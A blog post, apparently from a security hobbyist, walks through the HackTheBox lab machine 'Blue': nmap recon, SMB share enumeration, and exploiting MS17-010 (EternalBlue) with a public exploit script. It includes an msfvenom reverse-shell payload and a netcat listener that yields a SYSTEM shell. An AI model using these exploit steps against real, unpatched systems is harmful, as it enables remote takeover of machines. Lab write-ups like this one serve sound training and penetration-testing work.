<!DOCTYPE html>
<html lang="en">

  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta name="author" content="Sulejman Bijedic">
    <meta name="description" content="Write-ups about Linux and Security">
    <meta name="keywords" content="blog,security,linux">

    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Blue"/>
<meta name="twitter:description" content="Machine info  OS : Windows Difficulty : Easy Points : 20 IP : 10.10.10.40  Mind Map Reconnaisance I start with an initial scan, including the -sC option which will run also the default scripts:
sudo nmap -sC -sV -O 10.10.10.40 -n -oA nmap/initial Nmap scan report for 10.10.10.40 Host is up (0.073s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap."/>

    <meta property="og:title" content="Blue" />
<meta property="og:description" content="Machine info  OS : Windows Difficulty : Easy Points : 20 IP : 10.10.10.40  Mind Map Reconnaisance I start with an initial scan, including the -sC option which will run also the default scripts:
sudo nmap -sC -sV -O 10.10.10.40 -n -oA nmap/initial Nmap scan report for 10.10.10.40 Host is up (0.073s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49156/tcp open msrpc Microsoft Windows RPC 49157/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap." />
<meta property="og:type" content="article" />
<meta property="og:url" content="/posts/hackthebox/blue/" />
<meta property="article:published_time" content="2020-06-26T16:04:02+01:00" />
<meta property="article:modified_time" content="2020-06-26T16:04:02+01:00" />


    
      <base href="/posts/hackthebox/blue/">
    
    <title>
  Blue · lafx0
</title>

    
      <link rel="canonical" href="/posts/hackthebox/blue/">
    

    <link href="https://fonts.googleapis.com/css?family=Lato:400,700%7CMerriweather:300,700%7CSource+Code+Pro:400,700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.11.2/css/all.css" integrity="sha384-KA6wR/X5RY4zFAHpv/CnoG2UW1uogYfdnP67Uv7eULvTveboZJg0qUpmJZb5VqzN" crossorigin="anonymous" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.min.css" integrity="sha256-l85OmPOjvil/SOvVt3HnSSjzF1TUMyT9eV0c2BzEGzU=" crossorigin="anonymous" />

    
      
      
      <link rel="stylesheet" href="/css/coder.min.a4f332213a21ce8eb521670c614470c58923aaaf385e2a73982c31dd7642decb.css" integrity="sha256-pPMyITohzo61IWcMYURwxYkjqq84XipzmCwx3XZC3ss=" crossorigin="anonymous" media="screen" />
    

    

    

    
      <link rel="stylesheet" href="/css/custom.css" />
    

    

    

    <link rel="icon" type="image/png" href="/img/favicon-32x32.png" sizes="32x32">
    <link rel="icon" type="image/png" href="/img/favicon-16x16.png" sizes="16x16">

    <meta name="generator" content="Hugo 0.66.0" />
  </head>

  
  
  <body class="colorscheme-light">
    <main class="wrapper">
      <nav class="navigation">
  <section class="container">
    <a class="navigation-title" href="/">
      lafx0
    </a>
    
    <input type="checkbox" id="menu-toggle" />
    <label class="menu-button float-right" for="menu-toggle"><i class="fas fa-bars"></i></label>
    <ul class="navigation-list">
      
        
          <li class="navigation-item">
            <a class="navigation-link" href="/posts/">Blog</a>
          </li>
        
          <li class="navigation-item">
            <a class="navigation-link" href="/about/info/">About</a>
          </li>
        
      
      
    </ul>
    
  </section>
</nav>


      <div class="content">
        
  <section class="container post">
    <article>
      <header>
        <div class="post-title">
          <h1 class="title">Blue</h1>
        </div>
        <div class="post-meta">
          <div class="date">
            <span class="posted-on">
              <i class="fas fa-calendar"></i>
              <time datetime='2020-06-26T16:04:02&#43;01:00'>
                June 26, 2020
              </time>
            </span>
            <span class="reading-time">
              <i class="fas fa-clock"></i>
              6-minute read
            </span>
          </div>
          
          
        </div>
      </header>

      <div>
        
        <h1 id="machine-info">Machine info</h1>
<ul>
<li>OS : Windows</li>
<li>Difficulty : Easy</li>
<li>Points : 20</li>
<li>IP : 10.10.10.40</li>
</ul>
<h1 id="mind-map">Mind Map</h1>
<p><img src="/images/htb/blue_mindmap.png" alt="Blue_MindMap"></p>
<h1 id="reconnaisance">Reconnaisance</h1>
<p>I start with an initial scan, including the <code>-sC</code> option which will run also the default scripts:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">sudo nmap -sC -sV -O 10.10.10.40 -n -oA nmap/initial

Nmap scan report for 10.10.10.40
Host is up (0.073s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=6/27%OT=135%CT=1%CU=32915%PV=Y%DS=2%DC=I%G=Y%TM=5EF6F9
OS:81%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=S%TS
OS:=7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M
OS:54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=20
OS:00)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y
OS:%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0
OS:%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m37s, median: 0s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-06-27T08:47:05+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-06-27T07:47:07
|_  start_date: 2020-06-27T07:44:39

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</code></pre></div>
<p><strong>Note</strong>: <code>guest</code> appears to be a valid account.</p>
<h1 id="enumeration">Enumeration</h1>
<p>From the scan result I can see that <strong>port 445</strong> - used for SMB - is open and that the <code>message_signing</code> option is disabled. That means that I can login via SMB without providing credentials and list the shares available for that machine:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">smbclient -L 10.10.10.40
Enter WORKGROUP\user&#39;s password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Share           Disk      
        Users           Disk   </code></pre></div>
<p><strong>Note</strong>: I can obtain the same info with the following nmap script, which will return shares permission also:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">nmap --script smb-enum-shares 10.10.10.40</code></pre></div>
<p>I can check shares permissions with the <code>smbmap</code> command:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">smbmap -H 10.10.10.40 -u anonymous
[+] Guest session       IP: 10.10.10.40:445     Name: 10.10.10.40                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        Share                                                   READ ONLY
        Users                                                   READ ONLY</code></pre></div>
<p><strong>-&gt;</strong> I have <strong>READ</strong> permissions on the shares named <code>Share</code> and <code>Users</code>. I can list its content with smbclient but nothing useful is there.</p>
<p>I proceed checking for vulnerabilities with a nmap script scan on ports <code>139</code> and <code>445</code>:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">nmap --script smb-vuln* 10.10.10.40 -p 139,445 -n

Nmap scan report for 10.10.10.40
Host is up (0.097s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 15.96 seconds</code></pre></div>
<p>Where:</p>
<ul>
<li><code>smb-vuln*</code> is a wildcard notation useful to specify that I want to run all the scripts with the name starting with <code>smb-vuln</code></li>
</ul>
<p>The target is vulnerable to <strong>MS17-010</strong>:</p>
<blockquote>
<p>EternalBlue exploits a vulnerability in Microsoft&rsquo;s implementation of the Server Message Block (SMB) protocol. This vulnerability is denoted by entry CVE-2017-0144[15][16] in the Common Vulnerabilities and Exposures (CVE) catalog. The vulnerability exists because the SMB version 1 (SMBv1) server in various versions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to execute arbitrary code on the target computer.[17]</p>
</blockquote>
<blockquote>
<p>The NSA did not alert Microsoft about the vulnerabilities, and held on to it for more than five years before the breach forced its hand. The agency then warned Microsoft after learning about EternalBlue’s possible theft, allowing the company to prepare a software patch issued in March 2017,[18] after delaying its regular release of security patches in February 2017.</p>
</blockquote>
<h1 id="exploitation">Exploitation</h1>
<p>There is a well known <code>Metasploit</code> module available for this exploit, but I prefer to do it manually. So I go to <code>searchsploit</code> and search for:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">searchsploit eternalblue</code></pre></div>
<p>I find an interesting python script for <code>Win 7/8.1/2008</code> OS versions:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - &#39;EternalBlue&#39; SMB Remote Code Execution (MS17-010)                               | windows/remote/42315.py</code></pre></div>
<p>I download it on my machine:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">searchsploit -m windows/remote/42315.py</code></pre></div>
<p><strong>Note</strong>: always read the exploit code to understand what it is doing.</p>
<p>In order to work, the script:</p>
<ol>
<li>needs a <code>mysmb.py</code> file (easy to find)</li>
<li>needs an exploit to launch, I will create a <strong>msfvenom reverse shell</strong></li>
<li>needs a  valid <code>user/pass</code> couple -&gt; I know that <code>guest</code> user is allowed</li>
</ol>
<p>So, for point <strong>1</strong>, I can download the <code>mysmb.py</code> file like:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py</code></pre></div>
<p>For point <strong>2</strong>, I will create a <strong>reverse shell</strong> with <code>msfvenom</code> in the current directory:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f exe &gt; ./shell.exe</code></pre></div>
<p>At this point I have to edit the exploit file. There are plenty of resources on the internet explaining how to do that. One good resource is this one:</p>
<blockquote>
<p><a href="https://null-byte.wonderhowto.com/how-to/manually-exploit-eternalblue-windows-server-using-ms17-010-python-exploit-0195414/">https://null-byte.wonderhowto.com/how-to/manually-exploit-eternalblue-windows-server-using-ms17-010-python-exploit-0195414/</a></p>
</blockquote>
<p>Substantially, what I am doing is enabling a function named <strong>service_exec()</strong> that will connect to the target and upload the reverse shell I created. After that, It will try to execute it.</p>
<p>If everything goes well, I will have a connection back from the target!</p>
<p>At this point I have to set up a listener on my machine and launch the exploit which will connect back to me:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">python 42315.py 10.10.10.40

Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: samr
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
No transaction struct in leak data
leak failed... try again
CONNECTION: 0xfffffa8001f4f170
SESSION: 0xfffff8a001fb96a0
FLINK: 0xfffff8a0029645f0
InParam: 0xfffff8a00120b15c
MID: 0x2405
unexpected alignment, diff: 0x17585f0
leak failed... try again
CONNECTION: 0xfffffa8001f4f170
SESSION: 0xfffff8a001fb96a0
FLINK: 0xfffff8a0026b0048
InParam: 0xfffff8a00121715c
MID: 0x2402
unexpected alignment, diff: 0x1498048
leak failed... try again
CONNECTION: 0xfffffa8001f4f170
SESSION: 0xfffff8a001fb96a0
FLINK: 0xfffff8a001229088
InParam: 0xfffff8a00122315c
MID: 0x2503
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\shell.txt on the target
Opening SVCManager on 10.10.10.40.....
Creating service MYBp.....
Starting service MYBp.....
The NETBIOS connection with the remote host timed out.
Removing service MYBp.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done</code></pre></div>
<p><strong>Note</strong>: you have to launch the exploit a few times if it appears not to be working.</p>
<p>Here is the shell on my machine:</p>
<div class="highlight"><pre style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.40] 49298
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32&gt;whoami
whoami
nt authority\system

C:\Windows\system32&gt;</code></pre></div>
<p>And I am already <strong>SYSTEM</strong>! No privilege escalation is needed!</p>
<p><strong>Note</strong>: flags are under <code>\Administrator\Desktop</code> and <code>\Users\Desktop</code>.</p>
<h2 id="lessons-learned-and-remediations">Lessons learned and remediations</h2>
<ul>
<li>The machine was not patched against the well know <strong>EternalBlue</strong> exploit, also known as <strong>MS17-010</strong>. The administrator should have updated the machine.</li>
</ul>

      </div>


      <footer>
        


        
        
        
      </footer>
    </article>

    <script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
  <script type="text/javascript" async src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/startup.js" id="MathJax-script"></script>
  <script>
    MathJax = {
      tex: {
        inlineMath: [
          ['$', '$'], ['\\(', '\\)']
        ],
        processEscapes: true,
        processEnvironments: true
      },
      options: {
        skipHtmlTags: ['script', 'noscript', 'style', 'textarea', 'pre']
      }
    };
  </script>
  </section>

      </div>

      <footer class="footer">
  <section class="container">
    
      <p>'  '</p>
    
    
    
    
  </section>
</footer>

    </main>

    

    

  </body>

</html>
